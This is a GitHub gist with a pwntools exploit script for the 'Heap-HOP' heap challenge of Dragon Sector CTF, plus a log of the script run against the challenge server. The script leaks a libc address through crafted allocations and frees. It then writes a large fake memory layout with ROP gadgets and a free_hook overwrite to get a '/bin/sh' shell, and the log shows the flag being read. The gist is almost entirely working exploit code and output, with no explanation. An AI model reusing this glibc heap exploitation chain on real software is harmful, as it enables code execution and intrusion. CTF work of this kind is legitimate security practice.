Last active
November 23, 2020 09:13
-
-
Save d4em0n/3b4f509b39febba71f377ccd06f91f17 to your computer and use it in GitHub Desktop.
Heap-HOP Dragon Sector CTF
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| from pwn import * | |
| context.arch = "amd64" | |
| context.terminal = "tmux splitw -h -f".split() | |
| #cmd = "b* $_base()+0x1586" | |
| cmd = "" | |
| DEBUG = 0 | |
| p = process("./heap") | |
| #p = remote("yetanotherheap.hackable.software", 1337) | |
| if DEBUG: | |
| gdb.attach(p, cmd, gdb_args=['--init-eval-command="source ~/ctf/tools/gef/gef.py"']) | |
| def alloc(sz, content): | |
| p.sendlineafter(">", "1") | |
| p.sendlineafter(":", str(sz)) | |
| p.recvuntil("id: ") | |
| try: | |
| objid = int(p.recvuntil("\n", drop=True)) | |
| except: | |
| objid = 0 | |
| pass | |
| p.sendlineafter("content:", content) | |
| print("alloc({}, {}...) = {}".format(sz, content[:7], objid)) | |
| return objid | |
| def free(objid): | |
| p.sendlineafter(">", "2") | |
| p.sendlineafter("id:", str(objid)) | |
| alloc(0x20-1, str(1).ljust(0x20-1, "A")) | |
| alloc(0x10-1, "A"*15) | |
| alloc(0x30-1, "A"*(0x30-1)) | |
| free(0) | |
| alloc(0x20, (p32(0x610)+p32(0xfffffff9)).ljust(32, b"\xff")) | |
| free(97) | |
| alloc(0x10-1, "A"*15) | |
| i = 0 | |
| while alloc(0x10-1, str(i).ljust(15, "A")) != 127: | |
| i += 1 | |
| data = [1]*64 | |
| while True: | |
| c = alloc(0x10-1, str(i).ljust(15, "A")) | |
| data[c-128] = 0 | |
| if c == (127+64): | |
| break | |
| data = data[::-1] | |
| libc_leak = int("".join(list(map(str, data))),2) | |
| print(hex(libc_leak)) | |
| base = libc_leak-2014176 | |
| pbuffer = base+2036952 | |
| alloc(0x610, p64(0)*190+p64(0)+p64(0x611)+b"id".ljust(4, b"\x00")+p32(0x1)+p64(0x0)) | |
| print(hex(pbuffer)) | |
| alloc(0x610, (b"\x00"*0x28+p64(pbuffer)).ljust(0x610, b"\x00")) | |
| #pause() | |
| alloc(0x800, "A"*0x800) | |
| free(288) | |
| alloc(0x800, (p32(0x5b10)+p32(0xffffffff)*2+p32(0x7fffffff)).ljust(0x800, b"\xff")) | |
| #pause() | |
| print(hex(base)) | |
| buf_idx = 2875 # idx location of pbuffer | |
| payload = [0, 0, 0, 0, 0, 0, 0, 0, 2019168+base, 0, 0, 0, 644464+base, 646128+base, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 93824992252560, 0, 2014176+base, 2014176+base, 2014192+base, 2014192+base, 2014208+base, 2014208+base, 2014224+base, 2014224+base, 2014240+base, 2014240+base, 2014256+base, 2014256+base, 2014272+base, 2014272+base, 2014288+base, 2014288+base, 2014304+base, 2014304+base, 2014320+base, 2014320+base, 2014336+base, 2014336+base, 2014352+base, 2014352+base, 2014368+base, 2014368+base, 2014384+base, 2014384+base, 2014400+base, 2014400+base, 2014416+base, 2014416+base, 2014432+base, 2014432+base, 2014448+base, 2014448+base, 2014464+base, 2014464+base, 2014480+base, 2014480+base, 2014496+base, 2014496+base, 2014512+base, 2014512+base, 2014528+base, 2014528+base, 2014544+base, 2014544+base, 2014560+base, 2014560+base, 2014576+base, 2014576+base, 2014592+base, 2014592+base, 2014608+base, 2014608+base, 2014624+base, 2014624+base, 2014640+base, 2014640+base, 2014656+base, 2014656+base, 2014672+base, 2014672+base, 2014688+base, 2014688+base, 2014704+base, 2014704+base, 2014720+base, 2014720+base, 2014736+base, 2014736+base, 2014752+base, 2014752+base, 2014768+base, 2014768+base, 2014784+base, 2014784+base, 2014800+base, 2014800+base, 2014816+base, 2014816+base, 2014832+base, 2014832+base, 2014848+base, 2014848+base, 2014864+base, 2014864+base, 2014880+base, 2014880+base, 2014896+base, 2014896+base, 2014912+base, 2014912+base, 2014928+base, 2014928+base, 2014944+base, 2014944+base, 2014960+base, 2014960+base, 2014976+base, 2014976+base, 2014992+base, 2014992+base, 2015008+base, 2015008+base, 2015024+base, 2015024+base, 2015040+base, 2015040+base, 2015056+base, 2015056+base, 2015072+base, 2015072+base, 2015088+base, 2015088+base, 2015104+base, 2015104+base, 2015120+base, 2015120+base, 2015136+base, 2015136+base, 2015152+base, 2015152+base, 2015168+base, 2015168+base, 2015184+base, 2015184+base, 2015200+base, 2015200+base, 2015216+base, 2015216+base, 2015232+base, 2015232+base, 2015248+base, 2015248+base, 2015264+base, 2015264+base, 2015280+base, 2015280+base, 2015296+base, 2015296+base, 2015312+base, 2015312+base, 2015328+base, 2015328+base, 2015344+base, 2015344+base, 2015360+base, 2015360+base, 2015376+base, 2015376+base, 2015392+base, 2015392+base, 2015408+base, 2015408+base, 2015424+base, 2015424+base, 2015440+base, 2015440+base, 2015456+base, 2015456+base, 2015472+base, 2015472+base, 2015488+base, 2015488+base, 2015504+base, 2015504+base, 2015520+base, 2015520+base, 2015536+base, 2015536+base, 2015552+base, 2015552+base, 2015568+base, 2015568+base, 2015584+base, 2015584+base, 2015600+base, 2015600+base, 2015616+base, 2015616+base, 2015632+base, 2015632+base, 2015648+base, 2015648+base, 2015664+base, 2015664+base, 2015680+base, 2015680+base, 2015696+base, 2015696+base, 2015712+base, 2015712+base, 2015728+base, 2015728+base, 2015744+base, 2015744+base, 2015760+base, 2015760+base, 2015776+base, 2015776+base, 2015792+base, 2015792+base, 2015808+base, 2015808+base, 2015824+base, 2015824+base, 2015840+base, 2015840+base, 2015856+base, 2015856+base, 2015872+base, 2015872+base, 2015888+base, 2015888+base, 2015904+base, 2015904+base, 2015920+base, 2015920+base, 2015936+base, 2015936+base, 2015952+base, 2015952+base, 2015968+base, 2015968+base, 2015984+base, 2015984+base, 2016000+base, 2016000+base, 2016016+base, 2016016+base, 2016032+base, 2016032+base, 2016048+base, 2016048+base, 2016064+base, 2016064+base, 2016080+base, 2016080+base, 2016096+base, 2016096+base, 2016112+base, 2016112+base, 2016128+base, 2016128+base, 2016144+base, 2016144+base, 2016160+base, 2016160+base, 2016176+base, 2016176+base, 2016192+base, 2016192+base, 0, 0, 2014080+base, 0, 1, 135168, 135168, 654592+base, 660880+base, 0, 1804581+base, 1804581+base, 136561050+base, 136561029+base, 0, 0, 0, 1, 2, 2029592+base, 0, 18446744073709551615, 1830272+base, 0, 2000576+base, 2001920+base, 2002048+base, 2004224+base, 2001472+base, 2001344+base, 0, 2003392+base, 2003488+base, 2003616+base, 2003808+base, 2003936+base, 2004032+base, 1700800+base, 1696960+base, 1698496+base, 1806278+base, 1806278+base, 1806278+base, 1806278+base, 1806278+base, 1806278+base, 1806278+base, 1806278+base, 1806278+base, 1806278+base, 1806278+base, 1806278+base, 1806278+base, 0, 0, 0, 2016704+base, 0, 0, 0, 4222427270, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 2016928+base, 2, 18446744073709551615, 0, 2024624+base, 18446744073709551615, 0, 2013056+base, 0, 0, 0, 0, 0, 0, 2020512+base, 4222427268, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 2013568+base, 1, 18446744073709551615, 0, 2024640+base, 18446744073709551615, 0, 2013312+base, 0, 0, 0, 0, 0, 0, 2020512+base, 2016704+base, 2016928+base, 2013568+base, 160768+base, 1680176+base, 1684208+base, 1684256+base, 1684352+base, 1684944+base, 1685456+base, 1685696+base, 1685744+base, 1685840+base, 1685920+base, 704112+base, 1686320+base, 1686400+base, 1686512+base, 1686640+base, 1165264+base, 1686656+base, 1686720+base, 1327520+base, 1686912+base, 1687040+base, 1687296+base, 1687424+base, 1401136+base, 1687456+base, 1687504+base, 1687552+base, 1687600+base, 1687648+base, 1687824+base, 0, 0, 0, 0, 612864+base, 486960+base, 610496+base, 610512+base, 616448+base, 610608+base, 611136+base, 612976+base, 612224+base, 611936+base, 612848+base, 612336+base, 616816+base, 616832+base, 616784+base, 612848+base, 616800+base, 0, 0, 0, 0, 0, 0, 0, 565856+base, 513200+base, 610496+base, 610512+base, 565408+base, 566224+base, 568016+base, 612976+base, 612224+base, 611936+base, 612848+base, 566976+base, 616816+base, 616832+base, 616784+base, 612848+base, 616800+base, 0, 0, 0, 0, 0, 0, 0, 602320+base, 605952+base, 605088+base, 610512+base, 616448+base, 599888+base, 611136+base, 548016+base, 612224+base, 595632+base, 595264+base, 544240+base, 547728+base, 547776+base, 547856+base, 547952+base, 616800+base, 616848+base, 616864+base, 0, 0, 0, 0, 0, 602320+base, 605952+base, 605088+base, 610512+base, 616448+base, 599888+base, 611136+base, 596448+base, 612224+base, 595632+base, 595264+base, 544240+base, 599840+base, 597984+base, 595840+base, 552432+base, 597952+base, 616848+base, 616864+base, 0, 0, 0, 0, 0, 618192+base, 557504+base, 617168+base, 610512+base, 618160+base, 610608+base, 611136+base, 618544+base, 612224+base, 611936+base, 612848+base, 612336+base, 616816+base, 616832+base, 616784+base, 612848+base, 616800+base, 616848+base, 616864+base, 0, 0, 0, 0, 0, 570944+base, 563648+base, 569728+base, 565984+base, 570912+base, 566224+base, 568016+base, 571264+base, 612224+base, 611936+base, 612848+base, 566976+base, 616816+base, 616832+base, 616784+base, 612848+base, 616800+base, 616848+base, 616864+base, 0, 0, 0, 0, 0, 570944+base, 569840+base, 569728+base, 565984+base, 570912+base, 566224+base, 568016+base, 571264+base, 612224+base, 611936+base, 612848+base, 566976+base, 616816+base, 616832+base, 616784+base, 612848+base, 616800+base, 616848+base, 616864+base, 0, 0, 0, 0, 0, 602320+base, 577120+base, 576192+base, 565984+base, 565408+base, 578272+base, 598976+base, 573984+base, 612224+base, 595680+base, 577856+base, 549872+base, 599840+base, 597984+base, 595840+base, 595616+base, 597952+base, 616848+base, 616864+base, 0, 0, 0, 0, 0, 602320+base, 577120+base, 576256+base, 565984+base, 565408+base, 578272+base, 598976+base, 573984+base, 612224+base, 595680+base, 577856+base, 549872+base, 599840+base, 597984+base, 595840+base, 595792+base, 597952+base, 616848+base, 616864+base, 0, 0, 0, 0, 0, 602320+base, 577120+base, 572000+base, 565984+base, 565408+base, 578272+base, 598976+base, 573984+base, 612224+base, 595632+base, 577856+base, 549872+base, 599840+base, 597984+base, 595840+base, 595616+base, 597952+base, 616848+base, 616864+base, 0, 0, 0, 0, 0, 580544+base, 569840+base, 569728+base, 565984+base, 570912+base, 566224+base, 568016+base, 571264+base, 612224+base, 611936+base, 580448+base, 566976+base, 616816+base, 616832+base, 616784+base, 612848+base, 616800+base, 616848+base, 616864+base, 0, 0, 0, 0, 0, 583840+base, 617264+base, 617168+base, 610512+base, 618160+base, 610608+base, 611136+base, 618544+base, 612224+base, 611936+base, 583760+base, 612336+base, 616816+base, 616832+base, 616784+base, 612848+base, 616800+base, 616848+base, 616864+base, 0, 0, 0, 0, 0, 618192+base, 585712+base, 617168+base, 610512+base, 618160+base, 610608+base, 611136+base, 618544+base, 612224+base, 611936+base, 612848+base, 612336+base, 616816+base, 616832+base, 616784+base, 612848+base, 616800+base, 616848+base, 616864+base, 0, 0, 0, 0, 0, 0, 586304+base, 0, 0, 0, 586128+base, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 602320+base, 605952+base, 600704+base, 610512+base, 616448+base, 599888+base, 595952+base, 595504+base, 612224+base, 595680+base, 595264+base, 544240+base, 599840+base, 597984+base, 595840+base, 595616+base, 597952+base, 616848+base, 616864+base, 0, 0, 0, 0, 0, 602320+base, 605952+base, 601184+base, 610512+base, 616448+base, 599888+base, 598144+base, 599536+base, 612224+base, 595680+base, 595856+base, 544240+base, 599840+base, 597984+base, 595840+base, 595792+base, 597952+base, 616848+base, 616864+base, 0, 0, 0, 0, 0, 602320+base, 605952+base, 605088+base, 610512+base, 616448+base, 599888+base, 598976+base, 596448+base, 612224+base, 595632+base, 595264+base, 544240+base, 599840+base, 597984+base, 595840+base, 595616+base, 597952+base, 616848+base, 616864+base, 0, 0, 0, 0, 0, 618192+base, 617264+base, 617168+base, 610512+base, 618160+base, 610608+base, 611136+base, 618544+base, 612224+base, 611936+base, 612848+base, 612336+base, 616816+base, 616832+base, 616784+base, 612848+base, 616800+base, 616848+base, 616864+base, 614112+base, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 4, 10979526148415287693, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 128, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 136560104+base, 0, 0, 0, 93824992387072, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 136560088+base, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 9437184, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0] | |
| # 0x153a46 : mov rsi, r15 ; mov rax, qword ptr [rdi + 0x38] ; call qword ptr [rax + 8] | |
| # 0x15486a : mov rdi, qword ptr [rax] ; mov rax, qword ptr [rdi + 0x38] ; call qword ptr [rax + 0x20] | |
| # 0x1100db : mov rdx, qword ptr [rax + 0xb0] ; call qword ptr [rax + 0x88] | |
| payload[1541] = base+0x153a46 # free_hook | |
| payload[buf_idx+1] = base+0x15486a | |
| payload[buf_idx] = pbuffer+0x10 | |
| payload[buf_idx+2] = u64("/bin/sh\x00") | |
| payload[buf_idx+9] = pbuffer | |
| payload[buf_idx+4] = base+0x1100db | |
| payload[buf_idx+17] = base+0xe62f0 | |
| alloc(0x5b10,flat(payload)) | |
| print(hex(base+0x153a46)) | |
| free(97) | |
| p.interactive() |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| [+] Opening connection to yetanotherheap.hackable.software on port 1337: Done | |
| alloc(31, 1AAAAAA...) = 1 | |
| alloc(15, AAAAAAA...) = 97 | |
| alloc(47, AAAAAAA...) = 193 | |
| alloc(32, b'\x10\x06\x00\x00\xf9\xff\xff'...) = 0 | |
| alloc(15, AAAAAAA...) = 97 | |
| alloc(15, 0AAAAAA...) = 98 | |
| alloc(15, 1AAAAAA...) = 99 | |
| alloc(15, 2AAAAAA...) = 100 | |
| alloc(15, 3AAAAAA...) = 101 | |
| alloc(15, 4AAAAAA...) = 102 | |
| alloc(15, 5AAAAAA...) = 103 | |
| alloc(15, 6AAAAAA...) = 111 | |
| alloc(15, 7AAAAAA...) = 112 | |
| alloc(15, 8AAAAAA...) = 113 | |
| alloc(15, 9AAAAAA...) = 114 | |
| alloc(15, 10AAAAA...) = 115 | |
| alloc(15, 11AAAAA...) = 116 | |
| alloc(15, 12AAAAA...) = 117 | |
| alloc(15, 13AAAAA...) = 118 | |
| alloc(15, 14AAAAA...) = 119 | |
| alloc(15, 15AAAAA...) = 120 | |
| alloc(15, 16AAAAA...) = 121 | |
| alloc(15, 17AAAAA...) = 122 | |
| alloc(15, 18AAAAA...) = 123 | |
| alloc(15, 19AAAAA...) = 124 | |
| alloc(15, 20AAAAA...) = 125 | |
| alloc(15, 21AAAAA...) = 126 | |
| alloc(15, 22AAAAA...) = 127 | |
| alloc(15, 22AAAAA...) = 128 | |
| alloc(15, 22AAAAA...) = 129 | |
| alloc(15, 22AAAAA...) = 130 | |
| alloc(15, 22AAAAA...) = 131 | |
| alloc(15, 22AAAAA...) = 132 | |
| alloc(15, 22AAAAA...) = 138 | |
| alloc(15, 22AAAAA...) = 145 | |
| alloc(15, 22AAAAA...) = 149 | |
| alloc(15, 22AAAAA...) = 150 | |
| alloc(15, 22AAAAA...) = 152 | |
| alloc(15, 22AAAAA...) = 153 | |
| alloc(15, 22AAAAA...) = 154 | |
| alloc(15, 22AAAAA...) = 155 | |
| alloc(15, 22AAAAA...) = 156 | |
| alloc(15, 22AAAAA...) = 158 | |
| alloc(15, 22AAAAA...) = 159 | |
| alloc(15, 22AAAAA...) = 161 | |
| alloc(15, 22AAAAA...) = 162 | |
| alloc(15, 22AAAAA...) = 163 | |
| alloc(15, 22AAAAA...) = 164 | |
| alloc(15, 22AAAAA...) = 166 | |
| alloc(15, 22AAAAA...) = 175 | |
| alloc(15, 22AAAAA...) = 176 | |
| alloc(15, 22AAAAA...) = 177 | |
| alloc(15, 22AAAAA...) = 178 | |
| alloc(15, 22AAAAA...) = 179 | |
| alloc(15, 22AAAAA...) = 180 | |
| alloc(15, 22AAAAA...) = 181 | |
| alloc(15, 22AAAAA...) = 182 | |
| alloc(15, 22AAAAA...) = 183 | |
| alloc(15, 22AAAAA...) = 184 | |
| alloc(15, 22AAAAA...) = 185 | |
| alloc(15, 22AAAAA...) = 186 | |
| alloc(15, 22AAAAA...) = 187 | |
| alloc(15, 22AAAAA...) = 188 | |
| alloc(15, 22AAAAA...) = 189 | |
| alloc(15, 22AAAAA...) = 190 | |
| alloc(15, 22AAAAA...) = 191 | |
| 0x7fa1209dfbe0 | |
| alloc(1552, b'\x00\x00\x00\x00\x00\x00\x00'...) = 1 | |
| 0x7fa1209e54d8 | |
| alloc(1552, b'\x00\x00\x00\x00\x00\x00\x00'...) = 2 | |
| alloc(2048, AAAAAAA...) = 289 | |
| alloc(2048, b'\x10[\x00\x00\xff\xff\xff'...) = 288 | |
| 0x7fa1207f4000 | |
| alloc(23312, b'\x00\x00\x00\x00\x00\x00\x00'...) = 383 | |
| 0x7fa120947a46 | |
| [*] Switching to interactive mode | |
| $ ls | |
| flag.txt | |
| heap | |
| $ cat flag.txt | |
| DrgnS{Th4nk5_Qualys_f0r_Th3_1d34!!!!!11} |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment